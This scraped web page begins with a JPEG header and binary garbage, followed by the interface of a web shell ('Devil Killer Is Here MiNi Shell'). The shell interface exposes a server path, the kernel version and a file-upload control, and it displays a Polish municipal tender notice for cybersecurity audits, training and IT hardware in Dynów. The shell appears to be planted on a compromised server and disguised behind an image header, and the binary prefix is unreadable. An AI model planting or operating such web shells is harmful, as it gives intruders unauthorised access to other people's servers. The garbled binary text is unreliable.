JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241202/0062723201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu, oprogramowania i rozwiązań IT wraz z instalacją, wdrożeniem, oraz wykonanie audytów oraz szkoleń z zakresu cyberbezpieczeństwa w ramach projektu „Cyberbezpieczne Miasto Dynów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dynów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek, 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dynów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dynow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.dynow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu, oprogramowania i rozwiązań IT wraz z instalacją, wdrożeniem, oraz wykonanie audytów oraz szkoleń z zakresu cyberbezpieczeństwa w ramach projektu „Cyberbezpieczne Miasto Dynów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf05f171-5813-443e-9b22-23b921961434</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00627232</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00027352/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup sprzetu IT,oprogramowania, systemów oraz usług informatycznych i szkoleniowych niezbędnych do realizacji projektu grantowego Cyberbezpieczny Samorząd relizowanego pn.&#34; Cyberbezpieczne Miasto &#34;.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane jest z Programu pn. Fundusze Europejskie na Rozwój Cyfrowy 2021-2027 (FERC) Priorytet II: Zaawansowane usługi cyfrowe. Działanie 2.2 –Wzmocnienie krajowego systemu cyberbezpieczeństwa konkurs grantowy w ramach Projektu grantowego „Cyberbezpieczy Samorząd” o numerze FERC.02.02-CS.01-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-cf05f171-5813-443e-9b22-23b921961434 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej.<br/>Przedmiotowe postępowanie jest prowadzone przy użyciu środków komunikacji elektronicznej: za pośrednictwem Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl/).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z: „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. Konta uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>Składanie ofert następuje za pośrednictwem modułu składania ofert i wniosków (MOW) Platformy e-Zamówienia.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>W postepowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Wykonawca posiadający konto na Platformie na dostęp do formularzy: złożenia, wycofania oferty lub wniosku oraz do formularza do komunikacji. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji interaktywnej „oferty, wnioski i prace konkursowe” pod linkiem: https://ezamowienia.gov.pl/pl/instrukcje/<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.272.18.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część pierwsza zamówienia obejmuje:<br/>wykonanie audytów oraz szkoleń z zakresu cyberbezpieczeństwa – obszar organizacyjny <br/>i kompetencyjny w ramach projektu „Cyberbezpieczne Miasto Dynów - System bezpiecznych kopii dla cyberbezpieczeństwa kluczowych zasobów Miasta Dynowa.<br/>1.	Wykonanie audytów Systemu Zarządzania Bezpieczeństwem Informacji (w zgodności z rozporządzeniem Rady Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności zwanych dalej KRI) dla Urzędu Miasta Dynów (3 szt.); <br/>Audyty muszą być wykonane zgodnie z KRI z elementami Krajowego Systemu Cyberbezpieczeństwa w kontekście Systemu Zarządzania Bezpieczeństwem Informacji oraz muszą być zgodne z wytycznymi organów kontroli.<br/>Zespół audytorski jest zobowiązany także do weryfikacji zgodności z innymi przepisami, m.in. w zakresie:<br/>−	oceny zgodności z przepisami o ochronie danych osobowych (np. RODO), w kontekście zarządzania danymi i bezpieczeństwa informacjii cyberbezpieczeństwem;<br/>− weryfikację zgodności z krajowymi i międzynarodowymi normami i standardami w zakresie bezpieczeństwa informacji i cyberbezpieczeństwa.<br/>Realizacja audytów w wymienionych obszarach pozwoli na kompleksową ocenę stanu bezpieczeństwa informacji, interoperacyjności oraz cyberbezpieczeństwa w Urzędzie Miasta Dynów, identyfikację potencjalnych luk i ryzyk, a także rekomendację odpowiednich środków zaradczych i usprawnień.<br/><br/>2. Raport z audytu powinien zawierać:<br/>−	Opis zakresu przeprowadzonych prac audytowych: Szczegółowe przedstawienie metodologii, narzędzi i zakresu wykonanych testów i analiz.<br/>−	Analiza informacji zebranych podczas audytów: Przedstawienie i omówienie wyników testów, w tym zidentyfikowanych podatności i potencjalnych ryzyk.<br/>−	Wnioski i zalecenia dotyczące rozwiązań występujących problemów: Opracowanie propozycji działań naprawczych, zaleceń dotyczących poprawy bezpieczeństwa oraz strategii minimalizacji ryzyka.<br/>−	Weryfikacja aspektów technicznych: Szczegółowa analiza zabezpieczeń serwisów WWW, serwisów pocztowych, lokalnych sieci teleinformatycznych oraz połączenia z siecią Internet, wraz z zaleceniami dotyczącymi poprawy i utrzymania wysokiego poziomu bezpieczeństwa.<br/><br/>3. Audyty mają zostać przeprowadzone w siedzibie Urzędu Miejskiego w Dynowie <br/>w okresie realizacji projektu. <br/>Planowane terminy przeprowadzenia audytów: <br/>-	IV kw. 2024 r. ( do dnia 31.12.2024 r.)<br/>-	II kw. 2025 r.<br/>-	I kw. 2026 r.<br/>UWAGA<br/>Szczegółowy zakres rzeczowy audytów opisany został w załączniku nr 15 do SWZ – Projektowane postanowienia umowy. <br/><br/><br/>4.Przeprowadzenie szkolenia z zakresu cyberbezpieczeństwa dla pracowników <br/>i kierownictwa Urzędu Miasta Dynowa (3 szt.) w ramach Projektu Grantowego pn. „Cyberbezpieczny Samorząd” realizowany jest w ramach Programu Operacyjnego Fundusze Europejskie na Rozwój Cyfrowy 2021–2027 (FERC) Działanie 2.2. pn. „Wzmocnienie krajowego systemu cyberbezpieczeństwa” z podziałem na dwie grupy szkoleniowe w minimum czterogodzinnym wymiarze czasowym przypadającym dla każdej z grup, <br/>w formie stacjonarnej w siedzibie Zamawiającego.<br/>Zamawiający udostępni bezpłatnie pomieszczenie wyposażone w rzutnik oraz dostęp do Internetu, na potrzeby szkolenia stacjonarnego. <br/><br/>Szkolenia będą odbywać się w dni robocze od poniedziałku do piątku w godzinach pracy urzędu zgodnie z ustalonym wcześniej harmonogramem.<br/>5.Planowane terminy przeprowadzenia szkoleń jednodniowych to: <br/>1) szkolenie w IV kw. 2024 r., ( do dnia 31.12.2024 r.)<br/>2) szkolnie w II kw. 2025 r.<br/>3) szkolenie w I kw. 2026 r.<br/><br/>Na szkoleniu z aspektami praktycznymi poruszona zostanie tematyka cyberbezpieczeństwa, m.in. omówienie poprawnych zasad związanych z cyberbezpieczeństwem, wyjaśnienie zagrożenia w sieci takie jak phishing, ransomware oraz malware, sposoby przeciwdziałania oraz zabezpieczania się przed wymienionymi zagrożeniami, co ma na celu podniesienie wiedzy i kompetencji uczestników z zakresu cyberbezpieczeństwa.<br/><br/>6. Wymaga się, aby tematyka szkoleń zawierała co najmniej:<br/>−	omówienie poprawnych zasad związanych z cyberbezpieczeństwem;<br/>−	wyjaśnienie pojęcia „cyberbezpieczeństwo”;<br/>−	informacje na temat zagrożeń w sieci takie jak phishing, ransomware, malware, socjotechnika, atak telefoniczny, spoofing, wyłudzenia i inne zagrożenia - przykłady i omówienie sposobów przeciwdziałania oraz zabezpieczania się przed powyższymi zagrożeniami;<br/>−	metody nieautoryzowanego pozyskania danych wraz z przykładami;<br/>−	bezpiecznie przetwarzanie danych: szyfrowanie, przechowywanie, udostępnianie, komunikacja;<br/>−	stosowanie bezpiecznych haseł, autoryzacja dwuetapowa, klucze sprzętowe;<br/>−	metody obrony oraz przeciwdziałania (w tym: przed wyłudzeniem danych osobowych za pomocą metod socjotechnicznych, oprogramowaniem mogącym zablokować dostęp do urządzeń w urzędzie, szkodliwymi programami mogącymi pozyskać dane osobowe).<br/> Szczegółowy zakres rzeczowy szkoleń opisany został w załączniku nr 14 do SWZ – „Projektowane postanowienia umowy”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72810000-1 - Usługi audytu komputerowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79212000-3 - Usługi audytu</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część druga zamówienia obejmuje:<br/>dostawę sprzętu, oprogramowania i rozwiązań IT wraz z instalacją, wdrożeniem, uruchomieniem <br/>i migracją w ramach projektu grantowego „Cyberbezpieczne Miasto Dynów - System bezpiecznych kopii dla cyberbezpieczeństwa kluczowych zasobów Miasta Dynowa”<br/>Zgodnie z koncepcją projektu Zamawiający zamierza zakupić oraz uruchomić / wdrożyć sprzęt <br/>i oprogramowania oraz rozwiązania ICT, w ilościach wskazanych w tabeli poniżej.<br/>Lp.	Nazwa Ilość<br/>1.	Zakup nowego UTM z 2 letnimwsparciem, IPS, Advanced Malware Protection, Application Control, URL, DNS &amp; Video Filtering, Antispam Service	1<br/>2.	Wdrożenie systemu EDR przez rozszerzenie posiadanej licencji o<br/>funkcjonalność systemu EDR, Extended Detection &amp; Response, w okresie<br/>Trwania projektu, ESET PROTECE Enterprise On-Prem	1<br/>3	Zakup i wdrożenie zaawansowanej platformy do zarządzania dziennikami,<br/>analizowania, raportowania i reagowanie - w wersji VM, 5 GB na dzień z<br/>obsługą na 2 lata – rozwinięcie funkcji UTM	1<br/>4	Serwer z dwoma 16 rdzeniowymi procesorami, 256 GB RAM, nadmiarowym zasilaczem 1100W , 1 plus 1,kartami rozszerzeń do komunikacji oraz 2x M.2 min. 480GB ze wsparciem w okresie<br/>trwania projektu	1<br/>5	System operacyjny do serwera z 30 licencjami dostępowymi CAL	1<br/>6	Macierz dyskowa all flash – iSCSI 10Gb z 10 dyskami min. 1.92 TB SSA SAS ze wsparciem w okresie trwania Projektu	1<br/>7	Agregat prądotwórczy zewnętrzny o mocy znamionowej nie mniejszej jak <br/>20,0 kVA / 16,0 kW	1<br/>8	System załączania rezerwy (SZR) 4 x 40A wraz z wykonaniem instalacji elektrycznej łączącej agregat z siecią energetyczną budynku, uruchomienie i przygotowanie dokumentacji powykonawczej.	1<br/>9	Switch zarządzalny 24 portowy z opcją stakowania, 20 x 10Gb SFP, 4 x 25Gb SFP28 i 2 x 40Gb QSFP	2<br/>10	UPS dla stacji komputerowych o parametrach nie gorszych jak Moc<br/>Wyjściowa pozorna 1600 VA<br/>Moc wyjściowa czynna 900 W - wolnostojący, 4 gniazda wyjściowe AC	30<br/>11	Instalacja, wdrożenie, uruchomienie, migracja	1<br/><br/> UWAGA<br/>Dostawa nowego UTM z 2 letnim wsparciem, IPS, Advanced Malware Protection, Application Control, URL, DNS &amp; Video Filtering, Antispam Service musi się odbyć do dnia 31 grudnia 2024 r.<br/>Wykonawca zaoferuje powyższy sprzęt oraz program zgodnie z załącznikiem nr 2 do SWZ „Minimalne parametry sprzętu i oprogramowania w ramach w ramach projektu grantowego „Cyberbezpieczne Miasto Dynów - System bezpiecznych kopii dla cyberbezpieczeństwa kluczowych zasobów Miasta Dynowa” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48820000-2 - Serwery</p> <p class="mb-0">31122000-7 - Jednostki prądotwórcze</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">32422000-7 - Elementy składowe sieci</p> <p class="mb-0">35100000-5 - Urządzenia awaryjne i zabezpieczające</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48761000-0 - Pakiety oprogramowania antywirusowego</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">30233140-4 - Urządzenia do przechowywania dostępu bezpośredniego (DASD)</p> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Całkowita pojemność brutto macierzy (PBM)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pojemność dysków twardych serwera (PDS)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) O udzielenie zamówienia może ubiegać się Wykonawca 